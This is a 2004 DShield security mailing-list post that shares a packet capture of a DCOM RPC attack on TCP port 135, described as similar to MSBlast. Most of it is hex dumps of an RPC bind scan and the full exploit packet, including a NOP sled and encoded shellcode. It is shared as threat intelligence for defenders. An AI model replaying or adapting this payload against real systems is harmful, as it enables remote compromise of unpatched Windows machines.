[Dshield] TCP Port 135 Attack Capture

Blake McNeill mcneillb at linklogger.com
Wed Mar 10 14:26:02 GMT 2004


Port Peeker capture of the latest TCP Port 135 attack.  Note this is similar
but different then MSBlast.


The Scan
----------

68.145.74.189 : 3574 TCP Data In Length 72 bytes
MD5 = A26B51F9DD5297B37E393FF0610C0DEA
---- 10/03/2004 07:09:23.730
0000   05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00   ........H......
0010   D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00   ................
0020   A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46   ...............F
0030   00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00   .....]..........
0040   2B 10 48 60 02 00 00 00                           +.H`....


The Attack
------------

68.145.74.189 : 3574 TCP Data In Length 1624 bytes
MD5 = 8AD97DE838088EE11665D54841FEF2B3
---- 10/03/2004 07:09:23.790
0000   05 00 00 03 10 00 00 00 58 06 00 00 E5 00 00 00   ........X.......
0010   40 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00   @...............
0020   00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE   ....2$X..EdI.p..
0030   74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00   t,..`^..........
0040   70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00   p^......|^......
0050   10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20   ........*M...j.
0060   AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00   .nr.....MARB....
0070   00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00   ................
0080   D0 05 00 00 D0 05 00 00 4D 45 4F 57 04 00 00 00   ........MEOW....
0090   A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46   ...............F
00A0   38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46   8..............F
00B0   00 00 00 00 A0 05 00 00 98 05 00 00 00 00 00 00   ................
00C0   01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57   ............MEOW
00D0   98 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00   ................
00E0   07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00F0   00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00   .....(..d)......
0100   07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00   ................
0110   00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00   ...F............
0120   00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00   ...F............
0130   00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00   ...F............
0140   00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00   ...F............
0150   00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00   ...F............
0160   00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00   ...F............
0170   00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00   ...F....`...X...
0180   90 00 00 00 40 00 00 00 20 00 00 00 E8 02 00 00   .... at ... .......
0190   30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC   0...............
01A0   50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00   P...O.. ........
01B0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
01C0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
01D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
01E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
01F0   00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC   ................
0200   48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00   H.....f.........
0210   C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00   .......F........
0220   00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00   ............x...
0230   58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93   X...........p...
0240   98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00   .O...=.W....2.1.
0250   01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA   ................
0260   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0270   18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00   .C......`...`...
0280   4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00   MEOW............
0290   C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00   .......F;.......
02A0   C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00   .......F....0...
02B0   01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A   ...........J....
02C0   50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00   Poz.............
02D0   00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00   ................
02E0   01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00   ........0...x.n.
02F0   00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00   ................
0300   20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00    /..............
0310   00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00   ........F.X.....
0320   01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00   ............0...
0330   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0340   01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF   ........h.......
0350   68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00   h...............
0360   5E 01 00 00 00 00 00 00 5E 01 00 00 5C 00 5C 00   ^.......^...\.\.
0370   46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00   F.X.N.B.F.X.F.X.
0380   4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00   N.B.F.X.F.X.F.X.
0390   46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F   F.X...........
03A0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
03B0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
03C0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
03D0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
03E0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
03F0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0400   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0410   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0420   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0430   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0440   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0450   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0460   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0470   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0480   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0490   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
04A0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
04B0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
04C0   90 90 90 90 90 90 EB 0E 5B 4B 33 C9 B1 D9 80 34   ........[K3....4
04D0   0B 9A E2 FA EB 05 E8 ED FF FF FF 73 25 9A 9A 9A   ...........s%...
04E0   C5 FE 3B AA 9A 9A 9A 11 DA 96 11 EA 86 37 11 F2   ..;..........7..
04F0   92 11 6D F0 99 C3 72 C5 9A 9A 9A 78 63 F2 F5 F4   ..m...r....xc...
0500   9A 9A F2 EF E8 F6 F7 CE 65 8C 11 72 72 D3 9A 9A   ........e..rr...
0510   9A 11 64 19 5D 8A CD 1A AD 03 DD 1A A5 8B EF 6D   ..d.]..........m
0520   1A AD 8B C5 19 76 8E F2 FF E2 FF 9A F2 F5 E9 EE   .....v..........
0530   B4 F2 E9 EC F9 F2 F2 FF E8 E9 C6 F2 FE E8 F3 EC   ................
0540   11 46 A9 5A CA CA C9 CD CA 65 CC 96 1F 5A EF 9D   .F.Z.....e...Z..
0550   11 46 CA C9 65 CC 9E 65 CC 92 CB CC 11 DF A6 11   .F..e..e........
0560   CE B2 E2 99 4F C8 11 E8 BA 99 6F A9 53 D3 DB 37   ....O.....o.S..7
0570   99 5F A9 41 95 24 8A A0 4C EE 92 5B 51 97 99 40   ._.A.$..L..[Q..@
0580   DA 71 6B A1 85 EF 7D C0 11 C0 BE 99 47 FC 11 96   .qk...}.....G...
0590   D1 11 C0 86 99 47 11 9E 11 99 5F 31 C4 C3 59 72   .....G...._1..Yr
05A0   A6 65 65 65 14 D4 94 76 02 64 10 94 75 54 7A FA   .eee...v.d..uTz.
05B0   AC 80 B5 EA F1 ED ED E9 A3 B6 B6 AF A1 B7 A8 AD   ................
05C0   AC B7 AE AD B7 A8 A1 A0 A3 A8 A1 AA AC AE B6 CE   ................
05D0   F2 EA C9 F8 ED FA F1 B7 FC E1 FC 11 88 88 90 90   ................
05E0   90 90 90 90 90 90 90 90 90 90 90 00 5C 00 43 00   ............\.C.
05F0   24 00 5C 00 31 00 32 00 33 00 34 00 35 00 36 00   $.\.1.2.3.4.5.6.
0600   31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00   1.1.1.1.1.1.1.1.
0610   31 00 31 00 31 00 31 00 31 00 31 00 31 00 2E 00   1.1.1.1.1.1.1...
0620   64 00 6F 00 63 00 00 00 01 10 08 00 CC CC CC CC   d.o.c...........
0630   20 00 00 00 30 00 2D 00 00 00 00 00 88 2A 0C 00    ...0.-......*..
0640   02 00 00 00 01 00 00 00 28 8C 0C 00 01 00 00 00   ........(.......
0650   07 00 00 00 00 00 00 00                           ........


Blake McNeill
Link Logger Product Manager
http://www.LinkLogger.com

PS PortPeeker is a freeware port sniffing utility available on our website.






More information about the list mailing list